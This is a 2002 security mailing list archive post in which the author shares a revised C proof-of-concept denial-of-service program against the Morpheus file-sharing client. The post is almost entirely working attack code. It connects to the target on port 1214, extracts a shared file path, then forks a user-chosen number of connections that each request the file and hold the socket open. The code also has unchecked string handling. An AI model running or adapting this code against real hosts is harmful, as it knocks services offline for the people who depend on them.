Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Morpheus Request share files Deny of Service

From: "Gabriel A. Maggiotti" <gmaggiot () ciudad com ar>
Date: Wed, 06 Feb 2002 21:26:53 -0300
I modify the code,  i cut the port arg  " 1214".

/*---------------------------------------------------------------------------
Web:  http://qb0x.net                   Author: Gabriel A. Maggiotti
Date: Febrary 07, 2002                  E-mail: gmaggiot () ciudad com ar
---------------------------------------------------------------------------

General Info
------------
Problem Type    :  Request share files Deny of Service
Product         :  Morpheus
Scope           :  Remote
Risk            :  Low 
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX     1000
#define PORT    1214


/***************************************************************************/

int main(int argc,char *argv[])
{
        int sockfd, numbytes;
        char receive[MAX];
        char *top, *botton;
        int i;
        int loop;

        struct hostent *he;
        struct sockaddr_in their_addr;


        if(argc!=3)
        {
        fprintf(stderr,"usage:client hostname "\
                " [cant of loops]\n");
        exit(1);
        }


        if((he=gethostbyname(argv[1]))==NULL)
        {
        perror("gethostbyname");
        exit(1);
        }

        loop=atoi(argv[2]);

        if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                perror("socket");
                exit(1);
        }


        their_addr.sin_family=AF_INET;
        their_addr.sin_port=htons(PORT);
        their_addr.sin_addr=*((struct in_addr*)he->h_addr);
        bzero(&(their_addr.sin_zero),8);

        if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
                exit(1);


        if(send(sockfd,"GET / HTTP/1.0\n\n",16,0) ==-1)
        {
                perror("send");
                 exit(0);
        }

        if( (numbytes=recv(sockfd,receive,MAX,0))==-1 )
        {
                perror("recv");
                exit(1);
        }

        receive[numbytes]='\0';
        botton=strstr(receive,"href=\"");
        botton=botton+6;
        top=strchr(botton,'"');
        *top = '\0';
        sprintf(receive,"GET %s HTTP/1.0\n\n",botton);
        printf("file: %s",receive);
        close(sockfd);
        sleep(1);
/***************************************************************************/

        for(i=0; i<loop; i++)
        {

                if( fork()!=0)
                {

                        if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
                        {
                                perror("socket");
                                exit(1);
                        }

                        if( connect(sockfd,(struct sockaddr*)&their_addr,\
                                 sizeof(struct sockaddr))==-1)
                                exit(1);

                        if(send(sockfd,receive,strlen(receive),0) ==-1)
                        {
                                perror("send");
                                exit(0);
                        }

                        sleep(1000);
                        close(sockfd);
                        exit(0);
                }

        }


        printf("Done...\n");
        return 0;
}
Previous By Date Next
Previous By Thread Next

Current thread: